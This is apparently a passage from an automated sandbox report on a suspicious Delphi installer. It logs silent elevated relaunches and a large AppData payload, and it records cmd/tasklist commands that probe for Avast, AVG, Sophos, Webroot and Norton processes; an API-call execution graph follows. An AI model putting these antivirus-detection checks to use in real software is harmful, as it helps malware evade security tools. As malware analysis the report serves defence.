                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe"
                                                                                                                                                  Imagebase:0x230000
                                                                                                                                                  File size:8'767'044 bytes
                                                                                                                                                  MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 14%, ReversingLabs
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:20
                                                                                                                                                  Start time:10:37:24
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$4042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe"
                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                  File size:3'367'424 bytes
                                                                                                                                                  MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:21
                                                                                                                                                  Start time:10:37:25
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
                                                                                                                                                  Imagebase:0x230000
                                                                                                                                                  File size:8'767'044 bytes
                                                                                                                                                  MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:22
                                                                                                                                                  Start time:10:37:26
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$5042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
                                                                                                                                                  Imagebase:0xdb0000
                                                                                                                                                  File size:3'367'424 bytes
                                                                                                                                                  MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:24
                                                                                                                                                  Start time:10:37:51
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\timeout.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"timeout" 9
                                                                                                                                                  Imagebase:0x7ff637610000
                                                                                                                                                  File size:32'768 bytes
                                                                                                                                                  MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:25
                                                                                                                                                  Start time:10:37:51
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:26
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:27
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:28
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:29
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "wrsa.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:30
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:31
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:32
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:33
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "opssvc.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:34
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:35
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff70f330000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:36
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:37
                                                                                                                                                  Start time:10:38:00
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "avastui.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:38
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:39
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:40
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:41
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "avgui.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:42
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:43
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:44
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:45
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "nswscsvc.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:46
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                  Imagebase:0x7ff62b860000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:47
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:48
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff7d90d0000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:49
                                                                                                                                                  Start time:10:38:01
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "sophoshealth.exe"
                                                                                                                                                  Imagebase:0x7ff799d60000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:50
                                                                                                                                                  Start time:10:38:06
                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                  Imagebase:0x7ff6ec4b0000
                                                                                                                                                  File size:846'325'235 bytes
                                                                                                                                                  MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true


                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:18.3%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:20.9%
                                                                                                                                                    Total number of Nodes:1481
                                                                                                                                                    Total number of Limit Nodes:24
3724->3730 3725->3724 3773 405073 OleInitialize 3725->3773 3731 40537e 3727->3731 3733 405331 3727->3733 3734 405357 ShowWindow 3727->3734 3728 40518e 3740 406831 18 API calls 3728->3740 3735 403df6 8 API calls 3729->3735 3772 403dc4 SendMessageW 3730->3772 3731->3729 3736 405389 SendMessageW 3731->3736 3737 403d44 SendMessageW 3733->3737 3738 405377 3734->3738 3739 405369 3734->3739 3745 4052ba 3735->3745 3744 4053a2 CreatePopupMenu 3736->3744 3736->3745 3737->3729 3743 403d44 SendMessageW 3738->3743 3741 404f9e 25 API calls 3739->3741 3742 4051ad 3740->3742 3741->3738 3746 4062cf 11 API calls 3742->3746 3743->3731 3747 406831 18 API calls 3744->3747 3748 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3746->3748 3749 4053b2 AppendMenuW 3747->3749 3750 405203 SendMessageW SendMessageW 3748->3750 3751 40521f 3748->3751 3752 4053c5 GetWindowRect 3749->3752 3753 4053d8 3749->3753 3750->3751 3754 405232 3751->3754 3755 405224 SendMessageW 3751->3755 3756 4053df TrackPopupMenu 3752->3756 3753->3756 3757 403d6b 19 API calls 3754->3757 3755->3754 3756->3745 3758 4053fd 3756->3758 3759 405242 3757->3759 3760 405419 SendMessageW 3758->3760 3761 40524b ShowWindow 3759->3761 3762 40527f GetDlgItem SendMessageW 3759->3762 3760->3760 3763 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3760->3763 3764 405261 ShowWindow 3761->3764 3765 40526e 3761->3765 3762->3745 3766 4052a2 SendMessageW SendMessageW 3762->3766 3767 40545b SendMessageW 3763->3767 3764->3765 3771 403dc4 SendMessageW 3765->3771 3766->3745 3767->3767 3768 405486 GlobalUnlock SetClipboardData CloseClipboard 3767->3768 3768->3745 3770->3728 3771->3762 3772->3727 3774 403ddb SendMessageW 3773->3774 3778 405096 3774->3778 3775 403ddb SendMessageW 3776 4050d1 OleUninitialize 3775->3776 3777 4062cf 11 API calls 3777->3778 3778->3777 3779 40139d 80 API calls 3778->3779 3780 4050c1 3778->3780 3779->3778 3780->3775 4607 4020f9 GetDC GetDeviceCaps 4608 401446 18 API calls 4607->4608 4609 402116 
MulDiv 4608->4609 4610 401446 18 API calls 4609->4610 4611 40212c 4610->4611 4612 406831 18 API calls 4611->4612 4613 402165 CreateFontIndirectW 4612->4613 4614 4030dc 4613->4614 4615 4030e3 4614->4615 4617 405f7d wsprintfW 4614->4617 4617->4615 4618 4024fb 4619 40145c 18 API calls 4618->4619 4620 402502 4619->4620 4621 40145c 18 API calls 4620->4621 4622 40250c 4621->4622 4623 40145c 18 API calls 4622->4623 4624 402515 4623->4624 4625 40145c 18 API calls 4624->4625 4626 40251f 4625->4626 4627 40145c 18 API calls 4626->4627 4628 402529 4627->4628 4629 40253d 4628->4629 4630 40145c 18 API calls 4628->4630 4631 4062cf 11 API calls 4629->4631 4630->4629 4632 40256a CoCreateInstance 4631->4632 4633 40258c 4632->4633 4634 4026fc 4636 402708 4634->4636 4637 401ee4 4634->4637 4635 406831 18 API calls 4635->4637 4637->4634 4637->4635 3781 4019fd 3782 40145c 18 API calls 3781->3782 3783 401a04 3782->3783 3786 405eab 3783->3786 3787 405eb8 GetTickCount GetTempFileNameW 3786->3787 3788 401a0b 3787->3788 3789 405eee 3787->3789 3789->3787 3789->3788 4638 4022fd 4639 40145c 18 API calls 4638->4639 4640 402304 GetFileVersionInfoSizeW 4639->4640 4641 4030e3 4640->4641 4642 40232b GlobalAlloc 4640->4642 4642->4641 4643 40233f GetFileVersionInfoW 4642->4643 4644 402350 VerQueryValueW 4643->4644 4645 402381 GlobalFree 4643->4645 4644->4645 4646 402369 4644->4646 4645->4641 4651 405f7d wsprintfW 4646->4651 4649 402375 4652 405f7d wsprintfW 4649->4652 4651->4649 4652->4645 4653 402afd 4654 40145c 18 API calls 4653->4654 4655 402b04 4654->4655 4660 405e7c GetFileAttributesW CreateFileW 4655->4660 4657 402b10 4658 4030e3 4657->4658 4661 405f7d wsprintfW 4657->4661 4660->4657 4661->4658 4662 4029ff 4663 401553 19 API calls 4662->4663 4664 402a09 4663->4664 4665 40145c 18 API calls 4664->4665 4666 402a12 4665->4666 4667 402a1f RegQueryValueExW 4666->4667 4671 401a13 4666->4671 4668 402a45 4667->4668 4669 402a3f 4667->4669 4670 4029e4 RegCloseKey 4668->4670 4668->4671 4669->4668 4673 405f7d 
wsprintfW 4669->4673 4670->4671 4673->4668 4674 401000 4675 401037 BeginPaint GetClientRect 4674->4675 4676 40100c DefWindowProcW 4674->4676 4678 4010fc 4675->4678 4679 401182 4676->4679 4680 401073 CreateBrushIndirect FillRect DeleteObject 4678->4680 4681 401105 4678->4681 4680->4678 4682 401170 EndPaint 4681->4682 4683 40110b CreateFontIndirectW 4681->4683 4682->4679 4683->4682 4684 40111b 6 API calls 4683->4684 4684->4682 4685 401f80 4686 401446 18 API calls 4685->4686 4687 401f88 4686->4687 4688 401446 18 API calls 4687->4688 4689 401f93 4688->4689 4690 401fa3 4689->4690 4691 40145c 18 API calls 4689->4691 4692 401fb3 4690->4692 4693 40145c 18 API calls 4690->4693 4691->4690 4694 402006 4692->4694 4695 401fbc 4692->4695 4693->4692 4696 40145c 18 API calls 4694->4696 4697 401446 18 API calls 4695->4697 4698 40200d 4696->4698 4699 401fc4 4697->4699 4701 40145c 18 API calls 4698->4701 4700 401446 18 API calls 4699->4700 4702 401fce 4700->4702 4703 402016 FindWindowExW 4701->4703 4704 401ff6 SendMessageW 4702->4704 4705 401fd8 SendMessageTimeoutW 4702->4705 4707 402036 4703->4707 4704->4707 4705->4707 4706 4030e3 4707->4706 4709 405f7d wsprintfW 4707->4709 4709->4706 4710 402880 4711 402884 4710->4711 4712 40145c 18 API calls 4711->4712 4713 4028a7 4712->4713 4714 40145c 18 API calls 4713->4714 4715 4028b1 4714->4715 4716 4028ba RegCreateKeyExW 4715->4716 4717 4028e8 4716->4717 4722 4029ef 4716->4722 4718 402934 4717->4718 4720 40145c 18 API calls 4717->4720 4719 402963 4718->4719 4721 401446 18 API calls 4718->4721 4723 4029ae RegSetValueExW 4719->4723 4726 40337f 33 API calls 4719->4726 4724 4028fc lstrlenW 4720->4724 4725 402947 4721->4725 4729 4029c6 RegCloseKey 4723->4729 4730 4029cb 4723->4730 4727 402918 4724->4727 4728 40292a 4724->4728 4732 4062cf 11 API calls 4725->4732 4733 40297b 4726->4733 4734 4062cf 11 API calls 4727->4734 4735 4062cf 11 API calls 4728->4735 4729->4722 4731 4062cf 11 API calls 4730->4731 4731->4729 4732->4719 4741 406250 4733->4741 
